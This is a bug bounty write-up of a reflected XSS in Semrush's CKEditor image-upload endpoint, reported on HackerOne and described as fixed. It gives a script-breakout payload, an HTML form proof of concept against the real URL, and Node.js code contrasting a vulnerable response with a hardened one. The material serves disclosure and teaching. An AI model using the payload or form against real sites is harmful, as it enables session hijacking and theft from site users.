Recently I found something new to me: a bug on www.semrush.com, which runs a bug bounty program on HackerOne. It was the first time I found an XSS in a HackerOne program, so this is the story.
While I was looking around on semrush.com, going from one page to another and putting payloads into every field, I ended up on https://www.semrush.com/my-posts/. On this page you can write and post whatever you want. I tried putting XSS payloads into the fields, but nothing happened.
Then I tried uploading an image, and that is where it got interesting. I tried uploading a file with a malicious filename on that page. It looked like this:
I spent a long time analyzing the request and response of the image upload, but after a cup of coffee helped me focus, I noticed that the CKEditorFuncNum parameter in the request is reflected in the response. (CKEditorFuncNum is the numeric callback index CKEditor's file browser passes to its upload endpoint, so the server has no reason to accept anything but digits there.) I tried writing some plain text in it and saw that it came back in the response unchanged.
Once I knew it was reflected, I used an XSS payload to trigger it:
</script><script>alert(document.domain)</script> and it executed as script! The parameter is reflected inside the inline script of the response, so the leading </script> closes that script element and the rest of the value becomes a new script element whose body I control.
Knowing this, I made a simple HTML page to exploit it. The code looks like this:
<html>
  <body>
    <form action="https://www.semrush.com/my-posts/api/image/upload/?CKEditor=text&CKEditorFuncNum=dadasd</script><script>alert(document.domain)</script>&langCode=en" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Whenever a user clicks "Submit request", the XSS fires. Note that the form has no file input: the payload sits in the query string, so the request does not need a real image for the parameter to be reflected, which is what makes a one-click cross-site PoC possible.
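To show what is going on behind the reflected parameter and the PoC above, here is an added example in Node.js. It is not Semrush's code and not part of the original write-up. It assumes the upload endpoint answers with the standard CKEditor 4 file-browser callback page (window.parent.CKEDITOR.tools.callFunction(funcNum, url, msg) inside an inline script); the function names are hypothetical. It parses CKEditorFuncNum out of the exact PoC URL, builds the vulnerable response to show how the payload splits the script element in two, and then builds a hardened response that rejects anything but digits for the callback index and escapes the other values so they can never close the script.

```javascript
// Added example, not Semrush's code or the original write-up's PoC.
// ASSUMPTION: the upload endpoint answers with the standard CKEditor 4
// file-browser callback page, i.e.
//   <script>window.parent.CKEDITOR.tools.callFunction(funcNum, url, msg);</script>
// Function and variable names below are hypothetical.

// The exact form action URL from the write-up's PoC.
const POC_URL =
  "https://www.semrush.com/my-posts/api/image/upload/?CKEditor=text" +
  "&CKEditorFuncNum=dadasd</script><script>alert(document.domain)</script>&langCode=en";

// Pull CKEditorFuncNum out of the query string the way a server would.
function funcNumFromUrl(urlString) {
  return new URL(urlString).searchParams.get("CKEditorFuncNum");
}

// Vulnerable: the parameter is interpolated straight into the inline script.
// The HTML parser ends a script element at the first "</script" it sees,
// so a value containing "</script><script>..." closes the page's script and
// opens a second one whose body the attacker controls.
function vulnerableUploadResponse(funcNum, fileUrl, message) {
  return (
    '<script type="text/javascript">' +
    `window.parent.CKEDITOR.tools.callFunction(${funcNum}, '${fileUrl}', '${message}');` +
    "</script>"
  );
}

// Escape a string for use inside an inline <script>: JSON.stringify handles
// quotes, backslashes and newlines, and "<" is then written as \u003c so the
// literal can never contain "</script" (or "<!--") at the HTML level.
function toScriptLiteral(value) {
  return JSON.stringify(String(value)).replace(/</g, "\\u003c");
}

// Hardened: CKEditorFuncNum is an index into CKEditor's callback table, so
// only a short run of digits is acceptable; anything else is rejected before
// it reaches the template. url/message go through toScriptLiteral.
function hardenedUploadResponse(funcNum, fileUrl, message) {
  if (typeof funcNum !== "string" || !/^\d{1,10}$/.test(funcNum)) {
    throw new Error("invalid CKEditorFuncNum");
  }
  return (
    '<script type="text/javascript">' +
    `window.parent.CKEDITOR.tools.callFunction(${Number(funcNum)}, ` +
    `${toScriptLiteral(fileUrl)}, ${toScriptLiteral(message)});` +
    "</script>"
  );
}

// Count script elements as the HTML parser would see them; a callback page
// should contain exactly one.
function countScriptElements(html) {
  return (html.match(/<script\b/gi) || []).length;
}

if (typeof require !== "undefined" && require.main === module) {
  const fn = funcNumFromUrl(POC_URL);
  console.log("vulnerable page has", countScriptElements(vulnerableUploadResponse(fn, "/img/a.png", "")), "script elements");
  try {
    hardenedUploadResponse(fn, "/img/a.png", "");
  } catch (e) {
    console.log("hardened page:", e.message);
  }
}
```

The point of the two escapes in the hardened version is that they protect different parsers: JSON.stringify keeps the value a valid JavaScript string, but the HTML parser never sees JavaScript string boundaries and would still end the element at a raw "</script", which is why "<" is rewritten as \u003c as well. For the callback index itself, escaping is the wrong tool; it is an integer, so validate it as one.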
The Semrush security team marked this as valid, and it has since been fixed. More experience gained.
You can read the HackerOne report here: https://hackerone.com/reports/375352